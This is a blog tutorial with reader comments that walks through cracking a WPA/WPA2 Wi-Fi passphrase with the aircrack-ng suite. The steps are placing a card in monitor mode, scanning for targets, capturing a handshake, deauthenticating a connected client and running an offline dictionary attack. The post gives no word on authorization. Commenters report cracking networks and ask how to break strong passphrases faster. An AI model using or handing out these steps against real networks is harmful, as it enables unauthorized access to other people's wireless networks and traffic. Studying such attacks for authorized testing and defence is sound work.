How To Crack A WPA Key With Aircrack-ng
With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).
Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2
Step 1 : Setting up your network device
To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:
Command # iwconfig (to find all wireless network interfaces and their status)
Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)
Step 2 : Reconnaissance
This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:
Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.
Step 3 : Capturing Packets
To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:
Command # airodump-ng -c 1 bssid AP_MAC -w data mon0
Step 4 : De-Authentication Technique
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:
Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.
So, now we have successfully acquired a WPA Handshake.
Step 5 : Cracking WPA/WAP2
Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.
Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)
Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.
About The Author
Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.
Hi Shaharyar,
ReplyDeleteNice Post but this is a WPA cracking Tutorial via Backtrack can u Post one more tutorial of WPA cracking via windows because aircrack-ng is also available for windows but i dont know how to use it.
Amazing Stuff reallyhelped me out was always wondering how to crack it and got it cracked in less then 20 mins Good Jab brov keep on posting good stuff waiting for your new invention ..
ReplyDeleteRegards,
G.A
salam rafay i am from karachi i have a question Q. which institute is best for learn ethical hacking in karachi?
ReplyDelete@Ratnesh
ReplyDeleteThankyou for your appreciation. I'll try to write another tutorial of WPA via windows soon :)
@G.A
Thanks :)
and where do i get a large/relevant dictinary file (commonly known as wordlists) with common passphrases for free..
ReplyDeletesalam Shaharyar Shafiq,
ReplyDeleteu have done well with WPA/WPA2.
and your profile is really appriciated.
I have done all the WEP/WPA/WPA2 with dic attack.I have been looking for something that dont need dic attack but brutforce.
i used rainbow table as well but now very much happy.
Question is?
Can you check with the JOHN THE RIPER (AN OPTION THERE INCREMENTAL)WHAT IS DOES IT REDIRECT KEYWORDS TO THE CURRENT CRACKING PROCESS. I HAVE CHECKED AND TRIED BUT IT TAKE TOO LONG.
IF U CAN FIND ANY OTHER WAY CRACKING IN A VERY SHORT TIME.
normally people choose thr password like (TdrW%I5Gh$)this is not in dic. how to crack this quickly.
Allah hafiz
dear when i use iwlan0 command i can't see my wifi???
ReplyDeletehow i can set the wireless network card in monitor mode ??
ReplyDeletethnx :)
Which Operating System you guys use? If it is Linux base then which flavor do u prefer?
ReplyDeletepls someone help after handshake how i put the dictionary with aircarck i do all command but still nothing i dont how to install the dictionary on the desktop pls help me
ReplyDeletepls anyone help about aircrak-ng after handshake complete but i dont know how to install dictionar on the desktop how its run? pls help me shahid
ReplyDeletepls someone help after handshake how i put the dictionary with aircarck i do all command but still nothing i dont how to install the dictionary on the desktop pls help me
ReplyDelete